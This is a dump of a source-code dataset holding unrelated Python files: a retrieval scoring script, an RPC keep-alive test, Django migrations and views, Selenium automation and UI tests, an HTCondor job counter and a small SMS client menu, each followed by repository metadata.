    """Query the Lemur CGI summary page and return the average document
    length of database `database_num` (1-based; 5 numbers per database,
    the 5th being the average length).

    Fixed: the value was returned as the regex-captured *string*, which made
    `1.5 * doclen / avg_doclen` in cal_socre raise TypeError; cast to float.
    """
    url = 'http://fiji4.ccs.neu.edu/~zerg/lemurcgi/lemur.cgi?d=?'
    r = requests.get(url)
    html = r.text
    # Page body between <BODY> and <HR>, then all integers in it.
    parsed_html = re.compile(r'.*?<BODY>(.*?)<HR>', re.DOTALL).match(html).group(1)
    numbers = re.compile(r'(\d+)', re.DOTALL).findall(parsed_html)
    avg_doclen = float(numbers[5*(database_num-1)+4])
    return avg_doclen
def cal_socre(doclen, tf, avg_doclen):
    """Okapi TF weight of a term in a document:
    tf / (tf + 0.5 + 1.5 * doclen / avg_doclen).
    (Name keeps the original 'socre' typo for compatibility with callers.)
    """
    denominator = tf + 0.5 + 1.5 * doclen / avg_doclen
    return float(tf) / denominator
def cal_query_oktf(query_length, tf, avg_query_len):
    """Okapi TF weight on the query side:
    tf / (tf + 0.5 + 1.5 * query_length / avg_query_len)."""
    denominator = tf + 0.5 + 1.5 * query_length / avg_query_len
    return float(tf) / denominator
# Pipeline: parse topics, remove stopwords, stem terms, then score documents
# against each query and print the ranked results.
queries = get_query()
queries_after_stopping = stopping(queries)
queries_after_stemming, avg_query_len = stemming(queries_after_stopping)
send_request(queries_after_stemming, avg_query_len)
|
[
"douzongkun@gmail.com"
] |
douzongkun@gmail.com
|
2f521abc69b5e0850c15f9b1f908874de923fb8d
|
2542de653005fc353ec04539eb2e59821e9fc220
|
/test/functional/interface_http.py
|
94d3ee588e6322fdb6f941d3d965f2c067be3fc0
|
[
"MIT"
] |
permissive
|
wazzlecoin/wazzle
|
cb23d17a0cd252ba7770efdcde755f76386a2b85
|
661cd73a1f9eaae1e91a3fb83dc29f4d78f5b980
|
refs/heads/master
| 2021-05-17T17:05:21.597875
| 2020-05-04T15:01:35
| 2020-05-04T15:01:35
| 250,886,396
| 3
| 4
|
MIT
| 2020-03-29T09:12:18
| 2020-03-28T20:23:31
|
C++
|
UTF-8
|
Python
| false
| false
| 4,834
|
py
|
#!/usr/bin/env python3
# Copyright (c) 2014-2019 The Wazzle Core developers
# Distributed under the MIT software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
"""Test the RPC HTTP basics."""
from test_framework.test_framework import WazzleTestFramework
from test_framework.util import assert_equal, str_to_b64str
import http.client
import urllib.parse
class HTTPBasicsTest (WazzleTestFramework):
    """Low-level checks of the RPC HTTP server: persistent-connection
    (keep-alive) behavior across three differently-configured nodes, and
    rejection of oversized request URIs."""
    def set_test_params(self):
        self.num_nodes = 3
    def setup_network(self):
        self.setup_nodes()
    def run_test(self):
        #################################################
        # lowlevel check for http persistent connection #
        #################################################
        url = urllib.parse.urlparse(self.nodes[0].url)
        authpair = url.username + ':' + url.password
        headers = {"Authorization": "Basic " + str_to_b64str(authpair)}
        conn = http.client.HTTPConnection(url.hostname, url.port)
        conn.connect()
        conn.request('POST', '/', '{"method": "getbestblockhash"}', headers)
        out1 = conn.getresponse().read()
        assert b'"error":null' in out1
        assert conn.sock is not None #according to http/1.1 connection must still be open!
        #send 2nd request without closing connection
        conn.request('POST', '/', '{"method": "getchaintips"}', headers)
        out1 = conn.getresponse().read()
        assert b'"error":null' in out1 #must also response with a correct json-rpc message
        assert conn.sock is not None #according to http/1.1 connection must still be open!
        conn.close()
        #same should be if we add keep-alive because this should be the std. behaviour
        headers = {"Authorization": "Basic " + str_to_b64str(authpair), "Connection": "keep-alive"}
        conn = http.client.HTTPConnection(url.hostname, url.port)
        conn.connect()
        conn.request('POST', '/', '{"method": "getbestblockhash"}', headers)
        out1 = conn.getresponse().read()
        assert b'"error":null' in out1
        assert conn.sock is not None #according to http/1.1 connection must still be open!
        #send 2nd request without closing connection
        conn.request('POST', '/', '{"method": "getchaintips"}', headers)
        out1 = conn.getresponse().read()
        assert b'"error":null' in out1 #must also response with a correct json-rpc message
        assert conn.sock is not None #according to http/1.1 connection must still be open!
        conn.close()
        #now do the same with "Connection: close"
        headers = {"Authorization": "Basic " + str_to_b64str(authpair), "Connection":"close"}
        conn = http.client.HTTPConnection(url.hostname, url.port)
        conn.connect()
        conn.request('POST', '/', '{"method": "getbestblockhash"}', headers)
        out1 = conn.getresponse().read()
        assert b'"error":null' in out1
        assert conn.sock is None #now the connection must be closed after the response
        #node1 (2nd node) is running with disabled keep-alive option
        urlNode1 = urllib.parse.urlparse(self.nodes[1].url)
        authpair = urlNode1.username + ':' + urlNode1.password
        headers = {"Authorization": "Basic " + str_to_b64str(authpair)}
        conn = http.client.HTTPConnection(urlNode1.hostname, urlNode1.port)
        conn.connect()
        conn.request('POST', '/', '{"method": "getbestblockhash"}', headers)
        out1 = conn.getresponse().read()
        assert b'"error":null' in out1
        #node2 (third node) is running with standard keep-alive parameters which means keep-alive is on
        urlNode2 = urllib.parse.urlparse(self.nodes[2].url)
        authpair = urlNode2.username + ':' + urlNode2.password
        headers = {"Authorization": "Basic " + str_to_b64str(authpair)}
        conn = http.client.HTTPConnection(urlNode2.hostname, urlNode2.port)
        conn.connect()
        conn.request('POST', '/', '{"method": "getbestblockhash"}', headers)
        out1 = conn.getresponse().read()
        assert b'"error":null' in out1
        assert conn.sock is not None #connection must still be open: the daemon uses keep-alive by default
        # Check excessive request size
        # A long-but-acceptable URI yields a routing 404 ...
        conn = http.client.HTTPConnection(urlNode2.hostname, urlNode2.port)
        conn.connect()
        conn.request('GET', '/' + ('x'*1000), '', headers)
        out1 = conn.getresponse()
        assert_equal(out1.status, http.client.NOT_FOUND)
        # ... while an oversized URI must be rejected outright with 400.
        conn = http.client.HTTPConnection(urlNode2.hostname, urlNode2.port)
        conn.connect()
        conn.request('GET', '/' + ('x'*10000), '', headers)
        out1 = conn.getresponse()
        assert_equal(out1.status, http.client.BAD_REQUEST)
if __name__ == '__main__':
HTTPBasicsTest ().main ()
|
[
"62810104+wazzlecoin@users.noreply.github.com"
] |
62810104+wazzlecoin@users.noreply.github.com
|
7ac06a32c905204e1f99d52d0f91e3cdff349c56
|
769e3bdb320a57d680b46175d1959d73cb02e9c3
|
/books/migrations/0001_initial.py
|
867701ce4146399828c15ae1943484c3ed1dc4b2
|
[] |
no_license
|
nurbek-b/library_tutorial
|
28aed466f8cabd6180ddc574cb3de0b94de10623
|
4fda5928821a444302f4d15bdcb0466b3b3f842f
|
refs/heads/master
| 2022-05-12T10:55:50.813989
| 2019-09-23T11:12:10
| 2019-09-23T11:12:10
| 210,334,115
| 0
| 0
| null | 2022-04-22T22:31:25
| 2019-09-23T11:06:49
|
Python
|
UTF-8
|
Python
| false
| false
| 670
|
py
|
# Generated by Django 2.2.5 on 2019-09-19 13:21
from django.db import migrations, models
class Migration(migrations.Migration):
    """Initial schema: create the Book table (title, subtitle, author, isbn)."""
    initial = True
    dependencies = [
    ]
    operations = [
        migrations.CreateModel(
            name='Book',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('title', models.CharField(max_length=250)),
                ('subtitle', models.CharField(max_length=250)),
                ('author', models.CharField(max_length=100)),
                # 13 chars fits an ISBN-13 without separators.
                ('isbn', models.CharField(max_length=13)),
            ],
        ),
    ]
|
[
"foto.nurbek@gmail.com"
] |
foto.nurbek@gmail.com
|
a0b6a0d0c97e5be1bdf104408bab4638cd811d7e
|
9782d916b4d386423e6fbf3883dca1aa3d38b4fa
|
/login_submission.py
|
99f2f2b3346809022e04ee15608b2fe97ed96f4c
|
[] |
no_license
|
Jai-Prakash-Singh/my_bot
|
3826ac1a8b2491aaf3fc25c7f68c033b19c3ad8d
|
285fe4cd58da9c995a5a420d02ba1c953c4d1021
|
refs/heads/master
| 2021-01-20T11:13:50.607298
| 2013-12-31T11:21:43
| 2013-12-31T11:21:43
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,530
|
py
|
#!/usr/bin/env python
# -*- coding: latin-1 -*-
# -*- coding: iso-8859-15 -*-
# -*- coding: ascii -*-
# -*- coding: utf-8 -*-
from selenium import webdriver
from selenium.webdriver.common.keys import Keys
import firebug_proxy2
import time
from selenium.webdriver.support.ui import Select
def login():
    """Python 2 Selenium bot: log into goarticles.com and submit a prepared
    article (title from a literal, body read from the local file 'f1.html')."""
    #driver = webdriver.Firefox()
    link = "http://goarticles.com/members/"
    # Driver is created by the firebug_proxy2 helper (proxied browser).
    driver = firebug_proxy2.main(link)
    #driver.get(link)
    # Credentials are placeholders -- replace before running.
    elem = driver.find_element_by_name("email")
    elem.send_keys("xxxx@gmail.com")
    elem = driver.find_element_by_name("password")
    elem.send_keys("xxxxxxx")
    elem.send_keys(Keys.RETURN)
    #dir(driver)
    # Open the "add new article" form.
    elem = driver.find_element_by_id("add_new")
    elem.send_keys(Keys.RETURN)
    # Pick an article category by dropdown position (0-based index).
    select = Select(driver.find_element_by_name('category_id'))
    select.select_by_index(2)
    #select = Select(driver.find_element_by_name('sub_category_id'))
    #select.select_by_index(1)
    elem = driver.find_element_by_name("title")
    title = "Different Ways You Can Define Yourself "
    elem.send_keys(title)
    # Article body comes from a local HTML file; non-decodable bytes dropped.
    f = open("f1.html")
    body = f.read()
    body = unicode(body, errors='ignore')
    f.close()
    elem = driver.find_element_by_name("body")
    elem.send_keys(body)
    bio =" name Kaya, just learing how to write a article"
    elem = driver.find_element_by_name("resource")
    elem.send_keys(bio)
    elem = driver.find_element_by_name("submit").click()
    #elem.submit()
    # Give the site a moment to process the submission before closing.
    time.sleep(5)
    driver.close()
if __name__=="__main__":
login()
|
[
"jp213@ymail.com"
] |
jp213@ymail.com
|
6fc97569c1683b8f6b0ae41fbb6ae187e7bf1f43
|
996079c6ebe6e44e91f1e4111c5026762775f094
|
/python/10-completed-jobs-group-hour.py
|
f628c9784c7b4cc984ba221cdff46c3527b41488
|
[] |
no_license
|
svaclav/htcondor-scripts
|
bae1c9a3520c149c727881d3b981954a2ff42e35
|
62b562cb9f6445447b395902aebfa170904c1f25
|
refs/heads/master
| 2021-05-05T23:47:05.857963
| 2018-04-26T13:23:13
| 2018-04-26T13:23:13
| 116,820,881
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,333
|
py
|
#!/usr/bin/python
"""
Python 2 script: count completed HTCondor jobs per accounting group by
walking each schedd's recent history, then print a per-group summary.
"""
import string
import classad
import htcondor
from collections import defaultdict
# Completed-job counts keyed by accounting-group name.
jobsgroups = defaultdict(int)
groups = []
from optparse import OptionParser
parser = OptionParser()
parser.add_option("-s", action="store_false", dest='servers', default=True, help="use all servers")
(options, args) = parser.parse_args()
coll = htcondor.Collector("htc.farm.particle.cz")
# Collect group names from submitter ads; names look like '<x>_<group>.<rest>'.
for submAd in coll.query(htcondor.AdTypes.Submitter, 'true', ['Name', 'RunningJobs']):
    group = string.split(string.split(submAd['Name'],".")[0],"_")[1]
    groups.append(group)
# Walk each schedd's history (up to 200 recent jobs) and count completed
# jobs (JobStatus == 4) per accounting group.
for scheddAd in coll.query(htcondor.AdTypes.Schedd, 'true', [ 'Name', 'MyAddress', 'ScheddIpAddr' ]):
    schedd = htcondor.Schedd(scheddAd)
    for jobAd in schedd.history('true', ['AcctGroup', 'CompletionDate', 'JobStatus'], 200):
        accgroup = string.split(string.split(jobAd['AcctGroup'], ".")[0],"_")[1]
        if jobAd['JobStatus'] == 4:
            jobsgroups[accgroup] += 1
print "Number of completed jobs according to groups: "
print "=============================================\n "
for group, jobs in jobsgroups.iteritems():
    #print "Number of completed jobs according to group %s: %d" % (group, jobs)
    print '{0:10} ==> {1:10d}'.format(group, jobs)
|
[
"strachon@fzu.cz"
] |
strachon@fzu.cz
|
c07a4d322267bf67a777a7051bc7a430b443fe92
|
afc8d5a9b1c2dd476ea59a7211b455732806fdfd
|
/Configurations/WW/FullRunII/Full2018_v9/jetpt0/TheoUnc/configuration.py
|
896351662ad01c0f0e1bef1292a88edb50436912
|
[] |
no_license
|
latinos/PlotsConfigurations
|
6d88a5ad828dde4a7f45c68765081ed182fcda21
|
02417839021e2112e740607b0fb78e09b58c930f
|
refs/heads/master
| 2023-08-18T20:39:31.954943
| 2023-08-18T09:23:34
| 2023-08-18T09:23:34
| 39,819,875
| 10
| 63
| null | 2023-08-10T14:08:04
| 2015-07-28T07:36:50
|
Python
|
UTF-8
|
Python
| false
| false
| 704
|
py
|
# Configuration file to produce initial root files -- has both merged and binned ggH samples
# name of the TTree to read from the input files
treeName = 'Events'
# production tag; also identifies this configuration's outputs
tag = 'WW2018_v9_jetpt0_TheoUnc'
# used by mkShape to define output directory for root files
outputDir = 'rootFile'
# file with TTree aliases
aliasesFile = 'aliases.py'
# file with list of variables
variablesFile = 'variables.py'
# file with list of cuts
cutsFile = 'cuts.py'
# file with list of samples
samplesFile = 'samples.py'
# luminosity to normalize to (in 1/fb)
# https://github.com/latinos/LatinoAnalysis/blob/UL_production/NanoGardener/python/data/TrigMaker_cfg.py#L868 (874)
lumi = 59.83
# nuisances file for mkDatacards and for mkShape
nuisancesFile = 'nuisances.py'
|
[
"Susan.Dittmer@cern.ch"
] |
Susan.Dittmer@cern.ch
|
2b05bafede7ab1e332eb8bdd2d6fb60800679e32
|
0d7467b096fe7ce212c7459be0c2b485b5d86168
|
/shelfzilla/apps/manga/views/volumes.py
|
31975f8cc0ba665274f0def1f74bdc16d7f93aa6
|
[] |
no_license
|
fmartingr/shelfzilla
|
86ecb7cf2f97ff9b13a7a8ce2415299b80207111
|
628aaf3d8799550e76143f2d7e0c78bdbeebd11e
|
refs/heads/master
| 2023-06-11T13:26:22.297856
| 2015-10-14T06:25:35
| 2015-10-14T06:25:35
| 381,305,902
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 4,205
|
py
|
from django.http import HttpResponseRedirect
from django.template import RequestContext
from django.utils.translation import ugettext as _
from django.contrib import messages
from django.shortcuts import render_to_response, get_object_or_404
from django.core.urlresolvers import reverse
from ..models import Volume, UserWishlistVolume, UserHaveVolume, UserReadVolume
from .series import SeriesView
class WishlistVolumeView(SeriesView):
    """Toggle a volume on the current user's wishlist.
    Volumes already in the user's collection cannot be wishlisted."""
    template = 'manga/series/volumes/volume-pjax.html'
    def get(self, request, vid):
        volume = get_object_or_404(Volume, pk=vid)
        # Check if user already have this volume!
        try:
            UserHaveVolume.objects.get(volume=volume, user=request.user)
            messages.error(
                request,
                _('{} is already on your collection!').format(volume)
            )
        except UserHaveVolume.DoesNotExist:
            # Not owned: if already wishlisted, remove it ...
            try:
                user_wish = UserWishlistVolume.objects.get(
                    volume=volume, user=request.user)
                user_wish.delete()
                messages.info(request,
                              _('{} removed from wishlist').format(volume))
            except UserWishlistVolume.DoesNotExist:
                # ... otherwise add it to the wishlist.
                user_wish = UserWishlistVolume(
                    volume=volume, user=request.user)
                user_wish.save()
                messages.success(request, _('{} wishlisted!').format(volume))
        # PJAX requests get the partial template; full requests redirect back.
        context = RequestContext(request, {'volume': volume})
        if context.get('is_pjax'):
            return render_to_response(self.template, context_instance=context)
        else:
            return HttpResponseRedirect(
                reverse('series.detail', args=[volume.series.pk])
            )
class HaveVolumeView(SeriesView):
    """Toggle a volume in the current user's owned collection; adding an
    owned volume also drops it from the wishlist."""
    template = 'manga/series/volumes/volume-pjax.html'
    def get(self, request, vid):
        volume = get_object_or_404(Volume, pk=vid)
        try:
            # Already owned: remove it from the collection.
            user_have = UserHaveVolume.objects.get(
                volume=volume, user=request.user)
            user_have.delete()
            messages.info(request,
                          _('{} removed from collection.').format(volume))
        except UserHaveVolume.DoesNotExist:
            # Not owned yet: add it to the collection.
            user_have = UserHaveVolume(volume=volume, user=request.user)
            user_have.save()
            messages.success(request,
                             _('{} added to collection!').format(volume))
            # Remove from wishlist if it exists
            try:
                user_wish = UserWishlistVolume.objects.get(
                    volume=volume, user=request.user)
                user_wish.delete()
            except UserWishlistVolume.DoesNotExist:
                pass
        # PJAX requests get the partial template; full requests redirect back.
        context = RequestContext(request, {'volume': volume})
        if context.get('is_pjax'):
            return render_to_response(self.template, context_instance=context)
        else:
            return HttpResponseRedirect(
                reverse('series.detail', args=[volume.series.pk])
            )
class ReadVolumeView(SeriesView):
    """Flip the "read" flag of a volume for the requesting user.

    Toggles a UserReadVolume row: deletes it if present, creates it
    otherwise.  PJAX requests receive the partial template; plain requests
    redirect to the series detail page.
    """
    # Partial template rendered for PJAX requests.
    template = 'manga/series/volumes/volume-pjax.html'
    def get(self, request, vid):
        volume = get_object_or_404(Volume, pk=vid)
        lookup = {'volume': volume, 'user': request.user}
        try:
            # Already marked read -> unmark it.
            UserReadVolume.objects.get(**lookup).delete()
            messages.info(request,
                          _('{} marked as not read').format(volume))
        except UserReadVolume.DoesNotExist:
            # Not read yet -> record it.
            UserReadVolume(**lookup).save()
            messages.success(request, _('{} marked as read!').format(volume))
        context = RequestContext(request, {'volume': volume})
        if context.get('is_pjax'):
            return render_to_response(self.template, context_instance=context)
        return HttpResponseRedirect(
            reverse('series.detail', args=[volume.series.pk]))
|
[
"fmartingr@me.com"
] |
fmartingr@me.com
|
2d3521ff7dc65d4c46121f2cecc216071311db8b
|
1652b5c345a6f96717d1d07502a197834ab04221
|
/requirements/tests/ui/test_user_project_and_iteration_permission.py
|
7f9eb23ac65bb768fbc274754548b32492e93768
|
[] |
no_license
|
CS673Group3/project-mgmt-backend
|
5fe43412dd7efc4ea0693b7d6a9c430d1a1da795
|
21d2f5993a06edc46504eba395fca727c8b51422
|
refs/heads/master
| 2021-01-13T01:02:51.286403
| 2016-04-23T16:03:16
| 2016-04-23T16:03:16
| 51,478,447
| 0
| 3
| null | 2016-04-09T16:34:10
| 2016-02-10T22:49:55
|
Python
|
UTF-8
|
Python
| false
| false
| 10,584
|
py
|
# -*- coding: utf-8 -*-
from selenium import webdriver
from selenium.webdriver.common.by import By
from selenium.webdriver.common.keys import Keys
from selenium.webdriver.support.ui import Select
from selenium.common.exceptions import NoSuchElementException
from selenium.common.exceptions import NoAlertPresentException
import unittest
import time
import re
class TestUserProjectAndIterationPermission(unittest.TestCase):
    """UI test for project-manager permissions.

    SamuelLJackson (project manager) can create a project, add/remove the
    plain user george, create an iteration, and finally delete the project;
    george can only sign in and open what he was given access to.

    Refactor note: the original recorded script repeated the same 9-line
    poll-until-present loop ten times and the same login/logout click
    sequences six times; those are factored into the private helpers
    _wait_for, _login and _logout with identical behavior.
    """
    def setUp(self):
        # One Firefox session per test against the local dev server; the
        # 30 s implicit wait covers most element lookups.
        self.driver = webdriver.Firefox()
        self.driver.implicitly_wait(30)
        self.base_url = "http://127.0.0.1:8000"
        self.verificationErrors = []
        self.accept_next_alert = True
    def _login(self, username, password):
        """Click "Sign In" and submit the given credentials."""
        driver = self.driver
        driver.find_element_by_link_text("Sign In").click()
        driver.find_element_by_id("username").clear()
        driver.find_element_by_id("username").send_keys(username)
        driver.find_element_by_id("password").clear()
        driver.find_element_by_id("password").send_keys(password)
        driver.find_element_by_xpath("//button[@type='submit']").click()
    def _logout(self, username):
        """Log the named user out and return to the landing page."""
        driver = self.driver
        driver.find_element_by_link_text(username).click()
        driver.find_element_by_link_text("Logout").click()
        driver.find_element_by_link_text("Return to Home").click()
    def _wait_for(self, how, what, timeout=60):
        """Poll once per second until the element (how, what) is present.

        Fails the test with "time out" after *timeout* attempts — the same
        contract as the original inline wait loops.
        """
        for _ in range(timeout):
            try:
                if self.is_element_present(how, what):
                    break
            except:
                pass
            time.sleep(1)
        else:
            self.fail("time out")
    def test_user_project_and_iteration_permission(self):
        driver = self.driver
        driver.get(self.base_url + "/")
        driver.get(self.base_url + "/")
        # george (no PM permission) can sign in, but has nothing to manage.
        self._login("george", "1234")
        self._logout("george")
        # Samuel (project manager) creates a new project.
        self._login("SamuelLJackson", "snakes")
        driver.find_element_by_xpath(
            "//a[@onclick=\"showDialog('/req/newproject');\"]").click()
        self._wait_for(By.ID, "id_title")
        driver.find_element_by_id("id_title").clear()
        driver.find_element_by_id("id_title").send_keys("New Project")
        driver.find_element_by_id("id_description").clear()
        driver.find_element_by_id("id_description").send_keys(
            "This project shows that only a project manager permission will allow a user to make projects and iterations and add users to the project. Samuel L Jackson has this permission. George does not.")
        driver.find_element_by_link_text("Create Project").click()
        driver.find_element_by_link_text("Open").click()
        # Add george to the project as a Developer.
        driver.find_element_by_xpath(
            "//div[@id='page-wrapper']/div[2]/div[2]/div/div/div/h2/a[2]/i").click()
        self._wait_for(By.ID, "id_user_role")
        Select(driver.find_element_by_id("id_user_role")).select_by_visible_text(
            "Developer")
        driver.find_element_by_xpath(
            "//a[contains(@data-user-name, 'george')]").click()
        time.sleep(1)
        driver.find_element_by_link_text("Close").click()
        # Samuel creates an iteration, picking start/end dates from the
        # calendar popovers.
        driver.find_element_by_link_text("Iterations").click()
        driver.find_element_by_link_text("New Iteration").click()
        self._wait_for(By.ID, "id_title")
        driver.find_element_by_id("id_title").clear()
        driver.find_element_by_id("id_title").send_keys("SAMUEL ADDED THIS")
        driver.find_element_by_id("id_description").clear()
        driver.find_element_by_id("id_description").send_keys(
            "only Samuel can make iterations")
        driver.find_element_by_xpath(
            "//div[@id='id_start_date_popover']/div/span/i").click()
        self._wait_for(By.XPATH, "//tr[1]/td[4]")
        driver.find_element_by_xpath("//tr[1]/td[4]").click()
        driver.find_element_by_xpath(
            "//div[@id='id_end_date_popover']/div/span/i").click()
        self._wait_for(By.XPATH, "//div[5]/div[3]/table/tbody/tr[2]/td[4]")
        driver.find_element_by_xpath(
            "//div[5]/div[3]/table/tbody/tr[2]/td[4]").click()
        driver.find_element_by_link_text("Create").click()
        time.sleep(1)
        self._logout("SamuelLJackson")
        # george can open the project he was added to, but not manage it.
        self._login("george", "1234")
        driver.find_element_by_link_text("Open").click()
        time.sleep(1)
        self._logout("george")
        # Samuel re-saves george's role, then removes him from the project.
        self._login("SamuelLJackson", "snakes")
        driver.find_element_by_link_text("Open").click()
        self._wait_for(By.LINK_TEXT, "george")
        driver.find_element_by_link_text("george").click()
        self._wait_for(By.ID, "id_user_role")
        Select(driver.find_element_by_id("id_user_role")).select_by_visible_text(
            "Developer")
        driver.find_element_by_css_selector("button.btn.btn-primary").click()
        driver.find_element_by_link_text("george").click()
        self._wait_for(By.LINK_TEXT, "Close")
        driver.find_element_by_link_text("Close").click()
        driver.find_element_by_css_selector(
            "i.glyphicon.glyphicon-minus").click()
        self._wait_for(By.LINK_TEXT, "Delete")
        driver.find_element_by_link_text("Delete").click()
        time.sleep(1)
        driver.find_element_by_link_text("Close").click()
        time.sleep(1)
        self._logout("SamuelLJackson")
        # george signs in again; with his membership removed there is
        # nothing for him to open.
        self._login("george", "1234")
        self._logout("george")
        # Samuel deletes the whole project.
        self._login("SamuelLJackson", "snakes")
        driver.find_element_by_link_text("Delete").click()
        self._wait_for(By.LINK_TEXT, "Delete Project")
        driver.find_element_by_link_text("Delete Project").click()
        time.sleep(1)
        self._logout("SamuelLJackson")
    def is_element_present(self, how, what):
        # EAFP probe used by _wait_for; subject to the driver's implicit wait.
        try:
            self.driver.find_element(by=how, value=what)
        except NoSuchElementException as e:
            return False
        return True
    def is_alert_present(self):
        # True when a JS alert is currently open.
        try:
            self.driver.switch_to_alert()
        except NoAlertPresentException as e:
            return False
        return True
    def close_alert_and_get_its_text(self):
        """Accept or dismiss the current alert (per self.accept_next_alert)
        and return its text; the flag always resets to True afterwards."""
        try:
            alert = self.driver.switch_to_alert()
            alert_text = alert.text
            if self.accept_next_alert:
                alert.accept()
            else:
                alert.dismiss()
            return alert_text
        finally:
            self.accept_next_alert = True
    def tearDown(self):
        self.driver.quit()
        # Fail the test if any soft verification errors were collected.
        self.assertEqual([], self.verificationErrors)
if __name__ == "__main__":
    # Allow running this UI test module directly via the unittest runner.
    unittest.main()
|
[
"jwildey@gmail.com"
] |
jwildey@gmail.com
|
1daccf1c0b1c2010b9176d87471498251737910b
|
0ea8262ed5cba3482c0f450cfb290b646262b616
|
/BookingApp/urls.py
|
1dd506bede3bf0c30b6ac0865ad21fd71b1f3be7
|
[] |
no_license
|
squiremaguire69/MusicVenueConnect_Bookings
|
29608b187d49ef5604c12bd43685fc42c579cd25
|
f661354cc35a14f1144110cc45fee8550976cce6
|
refs/heads/master
| 2021-06-18T23:42:18.485183
| 2019-09-17T07:47:25
| 2019-09-17T07:47:25
| 205,142,645
| 0
| 0
| null | 2021-06-10T21:54:53
| 2019-08-29T10:54:06
|
Python
|
UTF-8
|
Python
| false
| false
| 867
|
py
|
"""BookingApp URL Configuration
The `urlpatterns` list routes URLs to views. For more information please see:
https://docs.djangoproject.com/en/1.11/topics/http/urls/
Examples:
Function views
1. Add an import: from my_app import views
2. Add a URL to urlpatterns: url(r'^$', views.home, name='home')
Class-based views
1. Add an import: from other_app.views import Home
2. Add a URL to urlpatterns: url(r'^$', Home.as_view(), name='home')
Including another URLconf
1. Import the include() function: from django.conf.urls import url, include
2. Add a URL to urlpatterns: url(r'^blog/', include('blog.urls'))
"""
from django.conf.urls import url, include
from django.contrib import admin
from accounts import urls as urls_accounts
# Root URLconf: the Django admin, plus everything under /accounts/
# delegated to the accounts app's URLconf.
urlpatterns = [
    url(r'^admin/', admin.site.urls),
    url(r'^accounts/', include(urls_accounts)),
]
|
[
"ubuntu@ip-172-31-16-218.ec2.internal"
] |
ubuntu@ip-172-31-16-218.ec2.internal
|
6305c2a6ec5451a12fab6e4ebc0042a8ed77e0a6
|
5d8f7a08d2577d6147bec184b49fb48302887eb6
|
/home/migrations/0005_blogpage.py
|
52b7f80687a5cd8f5209fd934f5dddc0c2f5c3d1
|
[] |
no_license
|
qrames/atelier_chazalote
|
6bd0b566f370f85e24caf5d7148dee4ed1c788bd
|
9c735913ddbdefe7ab3a7ff3a955ae51191c0b09
|
refs/heads/master
| 2020-06-07T19:27:01.392878
| 2019-06-21T10:33:37
| 2019-06-21T10:33:37
| 193,080,166
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 985
|
py
|
# Generated by Django 2.2.2 on 2019-06-20 20:36
from django.db import migrations, models
import django.db.models.deletion
import wagtail.core.fields
class Migration(migrations.Migration):
    # Auto-generated schema migration: creates the BlogPage model as a
    # Wagtail page subclass (one-to-one link to wagtailcore.Page) with
    # post date, intro and rich-text body fields.
    dependencies = [
        ('wagtailcore', '0041_group_collection_permissions_verbose_name_plural'),
        ('home', '0004_homepage_image'),
    ]
    operations = [
        migrations.CreateModel(
            name='BlogPage',
            fields=[
                ('page_ptr', models.OneToOneField(auto_created=True, on_delete=django.db.models.deletion.CASCADE, parent_link=True, primary_key=True, serialize=False, to='wagtailcore.Page')),
                ('date', models.DateField(verbose_name='Post date')),
                ('intro', models.CharField(max_length=250)),
                ('body', wagtail.core.fields.RichTextField(blank=True)),
            ],
            options={
                # Inherited Meta flattened by the migration autowriter.
                'abstract': False,
            },
            bases=('wagtailcore.page',),
        ),
    ]
|
[
"ramque@orange.fr"
] |
ramque@orange.fr
|
a9335dd89522d707e5634e25b5faa71cd943a0a7
|
85029dbf4d24e0b876a23b09fa269826c4be13b3
|
/Pregnant_App.py
|
8414e7fe2c99cf9b1aa17d78b59bdb6c8eb12fc4
|
[] |
no_license
|
liorbraun/SmsWithAmazon
|
2cc58feb73a6fce46912c8378e2e5478370e8d24
|
16ad64423e06f8a8c5d31789003436299d8a4bcf
|
refs/heads/master
| 2020-07-05T16:21:01.527065
| 2019-08-16T09:18:00
| 2019-08-16T09:18:00
| 202,696,341
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 985
|
py
|
from Functions import *
import datetime
Dt = datetime.date.today()  # run date, passed to the client/week helpers
ListOfclients = []  # NOTE(review): not used below; presumably managed inside Functions — verify
if __name__ == "__main__":
    # Minimal console menu; loops until the user types "exit".
    # NOTE(review): if this runs on Python 2, input() evaluates the typed
    # text — raw_input() would be safer; confirm the target interpreter.
    try:
        option = "a"
        id = 1  # running client id; NOTE(review): shadows the builtin id()
        while str.lower(option) != "exit":
            print("select option")
            print("1: Add client")
            print("2: save data")
            print("3: check week")
            print("4: Send Sms")
            option = input('enter selection : ')
            if str(option) == "1":
                Add_client(id, Dt)
                id += 1
                print("thank you client have been added")
            elif str(option) == "2":
                save_data()
            elif str(option) == "3":
                check_week(Dt)
            elif str(option) == "4":
                Sendsms("972528021250", "תרים לנגיחה")
            elif str(option) == "5":
                # Hidden option: not listed in the printed menu.
                add_text(2)
            print("thank you good bye")
    except Exception as e:
        # Catch-all so the menu never leaves a raw traceback on screen.
        print("error in main", e)
|
[
"yyyarden@gmail.com"
] |
yyyarden@gmail.com
|
8f5a88bcf626a9d5007eab0089ea995f9317cb34
|
09c63ef7a90f5c940b0d8e9b4477d47081daaf73
|
/eon/eon/communicator.py
|
4b1799900b75c1d64722ae17439be9f0757dab1a
|
[] |
no_license
|
MaxAndersson/openstackeon
|
8b3bc62110331357f30ee4b9c8c77c9bbf5a91df
|
484a6bc854e208af8a494d98ab74ec6706d3e66d
|
refs/heads/master
| 2021-01-01T03:43:47.182487
| 2016-05-13T08:41:44
| 2016-05-13T08:41:44
| 58,280,053
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 53,225
|
py
|
##-----------------------------------------------------------------------------------
## eOn is free software: you can redistribute it and/or modify
## it under the terms of the GNU General Public License as published by
## the Free Software Foundation, either version 3 of the License, or
## (at your option) any later version.
##
## A copy of the GNU General Public License is available at
## http://www.gnu.org/licenses/
##-----------------------------------------------------------------------------------
from array import array
import config
import os
import shutil
import logging
logger = logging.getLogger('communicator')
from time import sleep, time
import subprocess
import commands
import tarfile
from cStringIO import StringIO
import cPickle as pickle
import glob
import re
import numpy
import openstackeon,base64
